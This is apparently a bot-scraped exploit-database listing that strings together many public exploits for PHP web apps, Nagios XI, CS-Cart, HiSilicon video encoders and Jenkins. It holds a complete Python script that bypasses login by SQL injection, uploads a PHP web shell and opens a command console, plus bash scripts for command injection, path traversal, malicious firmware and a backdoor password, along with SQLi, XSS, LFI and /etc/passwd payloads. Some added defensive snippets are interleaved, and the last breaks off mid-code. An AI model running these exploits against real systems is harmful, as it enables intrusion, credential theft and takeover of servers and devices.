All posts by ISHACK AI BOT
-
Hotel Management System 1.0 - Remote Code Execution (Authenticated)
# Exploit Title: Hotel Management System 1.0 - Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020-09-23
# Exploit Author: Eren Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14458/hotel-management-system-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip
# Version: 1.0
# Tested on: Windows/Linux - XAMPP Server
# CVE : N/A
# Setup: pip3 install requests bs4 html5lib
# Exploit Code :

import requests, sys, string, random
from bs4 import BeautifulSoup


def get_random_string(length):
    letters = string.ascii_lowercase
    result_str = ''.join(random.choice(letters) for i in range(length))
    return result_str


session = requests.session()
Domain = ""
FileName = ""
RandomFileName = get_random_string(5) + ".php"


def Help():
    print("[?] Usage: python AporlorRCE.py <Domain>")


def Upload():
    # save_category stores the "img" part under /assets/img/ without checking
    # the extension, so a .php file is written there and served as code.
    burp0_url = Domain + "/admin/ajax.php?action=save_category"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
                     "Accept": "*/*",
                     "Accept-Language": "tr,en-US;q=0.7,en;q=0.3",
                     "Accept-Encoding": "gzip, deflate",
                     "Referer": "http://192.168.1.104/admin/index.php?page=categories",
                     "X-Requested-With": "XMLHttpRequest",
                     "Content-Type": "multipart/form-data; boundary=---------------------------11915271121184037197158049421",
                     "Connection": "close"}
    # Every boundary line must start at column 0; a leading space would stop
    # PHP from recognising the part delimiters.
    burp0_data = ("-----------------------------11915271121184037197158049421\r\n"
                  "Content-Disposition: form-data; name=\"id\"\r\n\r\n\r\n"
                  "-----------------------------11915271121184037197158049421\r\n"
                  "Content-Disposition: form-data; name=\"name\"\r\n\r\n1\r\n"
                  "-----------------------------11915271121184037197158049421\r\n"
                  "Content-Disposition: form-data; name=\"price\"\r\n\r\n1\r\n"
                  "-----------------------------11915271121184037197158049421\r\n"
                  "Content-Disposition: form-data; name=\"img\"; filename=\"" + RandomFileName + "\"\r\n"
                  "Content-Type: application/x-php\r\n\r\n"
                  "<?php system($_GET['cmd']); ?>\n\r\n"
                  "-----------------------------11915271121184037197158049421--\r\n")
    try:
        Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
        if Resp.text == "1":
            print("[+] Shell Upload Success")
        else:
            print("[-] Shell Upload Failed")
    except Exception:
        print("[-] Request Failed")
        Help()


def Login():
    # The login handler interpolates username/password into its SQL, so a
    # ' OR 1=1 # payload bypasses authentication.
    burp0_url = Domain + "/admin/ajax.php?action=login"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
                     "Accept": "*/*",
                     "Accept-Language": "tr,en-US;q=0.7,en;q=0.3",
                     "Accept-Encoding": "gzip, deflate",
                     "Referer": "http://localhost/fos/admin/login.php",
                     "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                     "X-Requested-With": "XMLHttpRequest",
                     "Connection": "close"}
    burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"}
    try:
        Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
        if Resp.text == "1":
            print("[+] Login Success")
        else:
            print("[-] Login Failed")
    except Exception:
        print("[-] Request Failed")
        Help()


def FoundMyRCE():
    global FileName
    burp0_url = Domain + "/admin/index.php?page=categories"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                     "Accept-Language": "tr,en-US;q=0.7,en;q=0.3",
                     "Accept-Encoding": "gzip, deflate",
                     "Connection": "close",
                     "Upgrade-Insecure-Requests": "1"}
    try:
        Resp = session.get(burp0_url, headers=burp0_headers)
        Soup = BeautifulSoup(Resp.text, "html5lib")
        Data = Soup.find_all("img")
        for MyRCE in Data:
            if RandomFileName in MyRCE["src"]:
                # The page links the image as ../assets/img/<stored name>; keep only
                # the stored name (str.strip() would eat leading letters of it).
                FileName = MyRCE["src"].split("/")[-1]
                print("[+] Found File Name: " + FileName)
    except Exception:
        print("[-] Request Failed")
        Help()


def Terminal():
    while True:
        try:
            Command = input("Console: ")
            burp0_url = Domain + "/assets/img/" + FileName + "?cmd=" + Command
            Resp = session.get(burp0_url)
            print(Resp.text)
        except KeyboardInterrupt:
            print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23")
            break
        except Exception:
            print("[-] Request Error")


if __name__ == "__main__":
    if len(sys.argv) == 2:
        Domain = sys.argv[1]
        Login()
        Upload()
        FoundMyRCE()
        Terminal()
    else:
        Help()
-
Seat Reservation System 1.0 - Unauthenticated SQL Injection
# Title: Seat Reservation System 1.0 - Unauthenticated SQL Injection
# Exploit Author: Rahul Ramkumar
# Date: 2020-09-16
# Vendor Homepage: www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
# Version: 1.0
# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
# CVE: CVE-2020-25762

# Description
The file admin_class.php does not perform input validation on the username and password parameters. An attacker can send malicious input in the POST request to /admin/ajax.php?action=login to bypass authentication, extract sensitive information, etc.

# PoC
1) Navigate to the admin login page. Example: http://192.168.1.72/seat_reservation/admin/login.php
2) Fill in dummy values for the 'username' and 'password' fields and send the request via an HTTP intercept tool.
3) Save the request to a file. Example: seat_reservation_sqli.req

POST /seat_reservation/admin/ajax.php?action=login HTTP/1.1
Host: 192.168.1.72
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
Origin: http://192.168.1.72
DNT: 1
Connection: close

username=admin&password=dummy

4) Run sqlmap on the saved request:
sqlmap -r seat_reservation_sqli.req --dbms=mysql --threads=10
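Both the Hotel Management System exploit above (which logs in with ' OR 1=1 #) and this advisory hinge on the same defect: the login handler interpolates username and password straight into its SQL. The following is an added example, not code from either advisory or vendor: it reproduces the bypass against an in-memory SQLite table constructed here for illustration and shows that a parameterised query is immune. SQLite has no `#` line comment, so the payload below uses `--`; against MySQL on XAMPP the page's `#` form behaves the same way.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the application's users table (not the real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')")
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """Builds the query by string interpolation, the pattern the advisories describe
    for admin_class.php: whatever the client sends becomes part of the SQL text."""
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    """Same check with bound parameters: the driver never lets the values
    alter the statement's structure."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


# The page's payload is "' OR 1=1 #"; "#" is a MySQL comment, "--" is SQLite's.
BYPASS = "' OR 1=1 --"


def demo():
    """Return the four outcomes so the difference is visible side by side."""
    db = make_db()
    return {
        "vulnerable/valid creds": login_vulnerable(db, "admin", "S3cret!"),
        "vulnerable/bypass": login_vulnerable(db, BYPASS, BYPASS),
        "parameterized/valid creds": login_parameterized(db, "admin", "S3cret!"),
        "parameterized/bypass": login_parameterized(db, BYPASS, BYPASS),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case:28s} -> {'logged in' if ok else 'rejected'}")
```

With the interpolated query the WHERE clause becomes `username = '' OR 1=1 --' AND ...`, everything after `--` is a comment, and the first row is returned regardless of credentials; the bound-parameter version treats the whole payload as a literal username and finds nothing.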
-
CS-Cart 1.3.3 - authenticated RCE
# Exploit Title: CS-Cart authenticated RCE
# Date: 2020-09-22
# Exploit Author: 0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.3
# Vulnerability Type: authenticated RCE

1. Get a PHP reverse shell from http://pentestmonkey.net/tools/web-shells/php-reverse-shell and edit the IP and PORT.
2. Change the extension from .php to .phtml and upload the file through the file manager (.phtml is still executed as PHP by the server).
3. Visit http://[victim]/skins/shell.phtml --> Profit.
-
CS-Cart 1.3.3 - 'classes_dir' LFI
# Exploit Title: CS-Cart unauthenticated LFI
# Date: 2020-09-22
# Exploit Author: 0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.4
# Vulnerability Type: unauthenticated LFI

http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00

Example:
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00

Note: the trailing %00 truncates the include path at the null byte so that whatever the script appends to classes_dir is ignored; this only works on PHP versions before 5.3.4, which reject null bytes in file paths.
-
Tourism Management System 1.0 - Arbitrary File Upload
#Exploit Title: Tourism Management System 1.0 - Arbitrary File Upload
#Date: 2020-10-19
#Exploit Author: Ankita Pal & Saurav Shukla
#Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/
#Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7204
#Version: V1.0
#Tested on: Windows 10 + xampp v3.2.4

Proof of Concept:

Step 1: Open the affected URL
http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php

Step 2: Open Tour Package -> Create

Malicious Request:

POST /Tourism%20Management%20System%20-TMS/tms/admin/create-package.php HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------63824304340061635682865592713
Content-Length: 1101
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
Upgrade-Insecure-Requests: 1

-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagename"

Pack1
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagetype"

Family
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagelocation"

Manali
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packageprice"

21
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagefeatures"

Free
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagedetails"

Details
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packageimage"; filename="file1.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="submit"


-----------------------------63824304340061635682865592713--
-
Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting
# Exploit Title: Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting
# Date: 10-18-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 18.04

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "Contact Templates" functionality of the Core Config Manager of Nagios XI.
# Vulnerable Parameter : tfName

# POC
# Exploit Details : The following request will create a contact template with an XSS payload as the contact template name. Click on "Relationships" for the malicious template to trigger the payload.

POST /nagiosxi/includes/components/ccm/index.php?type=contacttemplate&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 642
Origin: http://TARGET
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=contacttemplate&id=7&page=1&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1
Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i
Upgrade-Insecure-Requests: 1

tfName=<img+src=a+onerror=alert(1)>&tfFriendly=&tfEmail=&tfPager=&Active=1&tfAddress1=&tfAddress2=&tfAddress3=&tfAddress4=&tfAddress5=&tfAddress6=&radHostNotifEnabled=2&selHostPeriod=0&radStatusInfos=2&radNoStatusInfos=2&radServiceNotifEnabled=2&selServicePeriod=0&radCanSubCmds=2&radContactgroup=2&radServicecommand=2&radHostcommand=2&txtVariablename=&txtVariablevalue=&cmd=submit&mode=modify&hidId=7&hidName=test&hidServiceDescription=&hostAddress=127.0.0.1&exactType=contacttemplate&type=contacttemplate&genericType=contacttemplate&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1&token=3b8273eea1213ac4d2c1f3da1b0c370d
-
Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection
# Exploit Title: Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection
# Date: 10-18-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 18.04

# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Manage Users" functionality of the Core Config Manager of Nagios XI.
# Vulnerable Parameter : id

# POC
# The injection is time-based: the SLEEP(5) in the id parameter delays the response by about five seconds when the payload is evaluated. The cookie and token values below are session-specific and must be taken from your own logged-in session.

POST /nagiosxi/includes/components/ccm/index.php?type=user&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=user&id=2&page=1&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1
Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i
Content-Type: application/x-www-form-urlencoded
Content-Length: 338

username=test&alias=test&password=password&confirm=password&active=1&id=2+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))A)&cmd=admin&mode=modify&hidId=2&hidName=&hidServiceDescription=&hostAddress=127.0.0.1&exactType=user&type=user&genericType=user&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1&token=991611d98c6c8ea7d32c54522b346448
-
Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection
# Exploit Title: Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection
# Date: 10-18-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 18.04

# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Add a Trap Definition" functionality of the SNMP Trap Interface of Nagios XI.
# Vulnerable Parameter : id

# POC
# Time-based, as in the 'Manage Users' entry: the second id parameter carries the SLEEP(5) payload and a delayed response confirms the injection. The nagiosxi cookie is session-specific.

GET /nagiosxi/includes/components/nxti/index.php?event=test&oid=123&category=test&severity=test&desc=%3C%3E&format=&id=&SNMPTW%5Bhost%5D=&SNMPTW%5Bservice%5D=&SNMPTW%5Bseverity%5D=%24s&SNMPTW%5Boutput%5D=&exec%5B%5D=&raw-data=&mode=save&new=0&tab=3&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a) HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/nxti/index.php
Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i
-
Online Job Portal 1.0 - Cross Site Scripting (Stored)
# Exploit Title: Online Job Portal 1.0 Cross Site Scripting (Stored)
# Google Dork: N/A
# Date: 2020/10/17
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A

Proof of Concept:
1 - Open the URL http://localhost/jobportal/Employer/ManageJob.php
2 - Fill in the blanks with this payload: "><script>alert(1)</script>
3 - Click the submit button.
-
Online Student's Management System 1.0 - Remote Code Execution (Authenticated)
# Exploit Title: Online Student's Management System 1.0 - Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020/10/18
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/14490/online-students-management-system-php-full-source-code-2020.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A

Proof of Concept:
1 - Go to http://localhost/studentrecord/, click the "click here to sign in" text and log in with the credentials 070101:070101.
2 - Then go to http://localhost/studentrecord/my-profile.php, upload your shell file from the "upload new photo" section and click the update button.
3 - Finally, open your shell at http://localhost/studentrecord/staffphoto/shell.php
-
Online Discussion Forum Site 1.0 - XSS in Messaging System
# Exploit Title: Online Discussion Forum Site 1.0 - XSS in Messaging System
# Google Dork: N/A
# Date: 2020-10-17
# Exploit Author: j5oh
# Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site
# Version: 1.0
# Tested on: Windows 10 / Wamp Server
# CVE : N/A

The messaging subsystem in the Online Discussion Forum is vulnerable to stored XSS in the message body. The payload executes when the messages page is viewed: http://localhost/Online%20Discussion%20Forum%20Site/messages.php.

The XSS can be planted through the messaging interface: go to http://localhost/Online%20Discussion%20Forum%20Site/messages.php, select 'Send New Message', search for the user to send the message to, click the 'Send Message' button next to the user, and add the JavaScript in the message body.

Alternatively, if you know the recipient's user id, you can send the message directly through the tt parameter of http://localhost/Online%20Discussion%20Forum%20Site/messageH.php (uto carries the user id). The PHPSESSID must belong to a logged-in session.

# PoC:
curl -d 'uto=1&tt=<script> alert("XSS"); </script>' -b "PHPSESSID=798bkt3dkvoczjp7arnco3jf0c" http://localhost/Online%20Discussion%20Forum%20Site/messageH.php
-
HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: https://www.szuray.com/
# Software Link: N/A
# Version: up to 1.97
# Tested on: Linux
# CVE: CVE-2020-24219
# Vendors: URayTech
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979

if [ "$#" -ne 2 ]
then
  echo "Usage: $0 <server>[:<port>] <filepath>"
  echo "Example: $0 1.2.3.4:8086 /box/box.ini"
  exit 1
fi

# --path-as-is stops curl from collapsing the "../" segments client-side,
# so the raw traversal sequence reaches the device's web server unchanged.
curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \
  || echo "ERROR: curl returned $?"
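The device hands the file over because nothing confines the requested path to its web root; curl's --path-as-is matters only because the client would otherwise collapse the ../ segments before the server ever saw them. The following is an added example, not part of the advisory or the vendor's firmware: it shows in Python what a naive path mapping does with the advisory's exact request path and the containment check a server should perform instead. The document root /box/www is an assumed value chosen for illustration.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for illustration; the advisory does not name the device's.
WEBROOT = "/box/www"

# Request path exactly as the advisory's curl --path-as-is sends it, with
# /box/box.ini as the <filepath> argument.
ADVISORY_PATH = "/../../sys/devices/media/13070000.jpgd/../../../../box/box.ini"


def naive_map(webroot, url_path):
    """What a careless file handler does: glue the path onto the root and let the
    filesystem resolve it. Every '..' walks one directory up and out of the root."""
    return posixpath.normpath(webroot + "/" + unquote(url_path))


def safe_map(webroot, url_path):
    """Decode, normalise, then refuse any result that is not inside the root.
    Comparing normalised strings is what stops '..' (and %2e%2e) from escaping."""
    root = posixpath.normpath(webroot)
    relative = unquote(url_path).lstrip("/")
    target = posixpath.normpath(posixpath.join(root, relative))
    if target != root and not target.startswith(root + "/"):
        raise PermissionError(f"path escapes document root: {url_path!r}")
    return target


def is_traversal(url_path):
    """Detection-side helper for proxy or access logs: does the raw request path
    try to leave the root at all?"""
    try:
        safe_map(WEBROOT, url_path)
        return False
    except PermissionError:
        return True


if __name__ == "__main__":
    print("naive mapping of the advisory path ->", naive_map(WEBROOT, ADVISORY_PATH))
    for p in ("/index.html", ADVISORY_PATH, "/%2e%2e/%2e%2e/box/box.ini"):
        print(f"{p!r:64s} traversal={is_traversal(p)}")
```

The naive mapping of the advisory's path resolves to /box/box.ini, the file the advisory's example reads; safe_map raises on it and on the percent-encoded variant, while a path that merely contains ".." but stays inside the root (/css/../index.html) is still accepted.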
-
HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979

if [ "$#" -ne 2 ]
then
  echo "Usage: $0 <server>[:<port>] <command>"
  exit 1
fi

printf "creating uk.rar... "
# The "firmware" is just a RAR archive whose uk.txt member holds the command;
# -ma4 selects the RAR 4.x archive format.
echo "$2" > uk.txt
rar a -ma4 uk.rar uk.txt >/dev/null 2>&1 || { echo "ERROR: rar failed. Is it installed?"; exit 2; }
echo "done"
rm uk.txt

printf "uploading the RAR file... "
# The multipart field name is assumed to be 'upgrade', matching the
# command-injection PoC for the same upload endpoint below.
if curl -s -F 'upgrade=@uk.rar' http://$1 >/dev/null
then
  echo "SUCCESS: remote command executed"
  rm uk.rar
else
  echo "ERROR: $?"
fi
-
HiSilicon Video Encoders - RCE via unauthenticated command injection
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated command injection
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979

if [ "$#" -ne 2 ]
then
  echo "Usage: $0 <server>[:<port>] <command>"
  exit 1
fi

printf "executing the command... "
# The filename of the uploaded part ends up in a shell command on the device,
# so "logo;<command>;.png" runs <command>. The part body itself is empty.
if curl -sF "upgrade=;filename=\"logo;$2;.png\"" http://$1 >/dev/null
then
  echo "SUCCESS: remote command executed"
else
  echo "ERROR: $?"
fi
-
HiSilicon Video Encoders - Full admin access via backdoor password
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - full admin access via backdoor password
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24215
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979

if [ "$#" -ne 1 ]
then
  echo "Usage: $0 <server>[:<port>]"
  exit 1
fi

printf "retrieving the password... "
# 'neworange88888888' is the hard-coded backdoor password; /get_sys returns the
# device configuration, including the real admin password in <html_password>.
password=$(curl -s --user admin:neworange88888888 http://$1/get_sys | \
  grep -oP '(?<=<html_password>).*?(?=</html_password>)')
ret=$?
if [ "$ret" -eq 0 ]
then
  echo "the password is '$password'"
  echo "navigate to http://$1 and log into the admin interface with user 'admin' and password '$password'"
else
  echo "ERROR: curl returned $ret"
fi
-
Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in
# Exploit Title: Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in
# Date: 8th October 2020
# Exploit Author: dmw0ng
# Vendor Homepage: https://www.jenkins.io
# Software Link: http://archives.jenkins-ci.org/windows/jenkins-2.63.zip
# Version: Jenkins 2.63
# Tested on: Ubuntu 18.04 / 20.04
# CVE : CVE-2019-1003030

The Groovy script is submitted to the SecureGroovyScript checkScript form-validation endpoint with sandbox=true; the command in the class constructor is executed on the Jenkins master. The value parameter must be URL-encoded when sent (shown decoded here for readability, encoded below).

GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x { public x(){ "ping -c 1 xx.xx.xx.xx".execute() } } HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0
Connection: close
Upgrade-Insecure-Requests: 1

URL-encode the following for RCE:

```public class x {
  public x(){
"ping -c 1 xx.xx.xx.xx".execute()
}
}
```

which becomes

%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
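The request above leaves a clear trace in web-server logs: a GET to the SecureGroovyScript checkScript endpoint whose value parameter, once percent-decoded, contains a Groovy class that calls .execute() from its constructor. The following is an added example, not part of the advisory: detection logic that decodes the value parameter from constructed access-log lines (one of which carries the page's encoded payload) and flags process-spawning Groovy. The combined log format, the /jenkins context path and the benign println sample are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

CHECKSCRIPT_SUFFIX = ("/descriptorByName/org.jenkinsci.plugins.scriptsecurity"
                      ".sandbox.groovy.SecureGroovyScript/checkScript")
# Groovy idioms that spawn a process; extend as needed.
SPAWN_MARKERS = (".execute(", "Runtime.getRuntime(", "ProcessBuilder(")

# Percent-encoded payload exactly as given in the advisory above.
PAYLOAD = ("%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63"
           "%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78"
           "%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d")

# Constructed access-log lines (combined log format is an assumption). Line 1 is
# the advisory's request; line 2 is a harmless println("hi") for contrast.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Oct/2020:10:00:01 +0000] "GET /jenkins/job/build1/ HTTP/1.1" 200 5120',
    '10.0.0.9 - admin [08/Oct/2020:10:00:07 +0000] "GET /jenkins/securityRealm/user/admin'
    f'{CHECKSCRIPT_SUFFIX}?sandbox=true&value={PAYLOAD} HTTP/1.1" 200 0',
    '10.0.0.9 - admin [08/Oct/2020:10:00:09 +0000] "GET /jenkins/securityRealm/user/admin'
    f'{CHECKSCRIPT_SUFFIX}?sandbox=true&value=%70%72%69%6e%74%6c%6e%28%22%68%69%22%29 HTTP/1.1" 200 0',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_check_script(log_line):
    """Return the decoded Groovy from a checkScript request, or None for any other line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith(CHECKSCRIPT_SUFFIX):
        return None
    # parse_qs percent-decodes, so %0a/%22/%28 become newline, quote and paren again.
    return parse_qs(parts.query).get("value", [""])[0]


def is_sandbox_abuse(script):
    """True when the submitted script contains a process-spawning idiom."""
    return script is not None and any(marker in script for marker in SPAWN_MARKERS)


def scan(lines):
    """Return (line index, decoded script) for every checkScript call that spawns a process."""
    hits = []
    for i, line in enumerate(lines):
        script = decode_check_script(line)
        if is_sandbox_abuse(script):
            hits.append((i, script))
    return hits


if __name__ == "__main__":
    for i, script in scan(SAMPLE_LOG):
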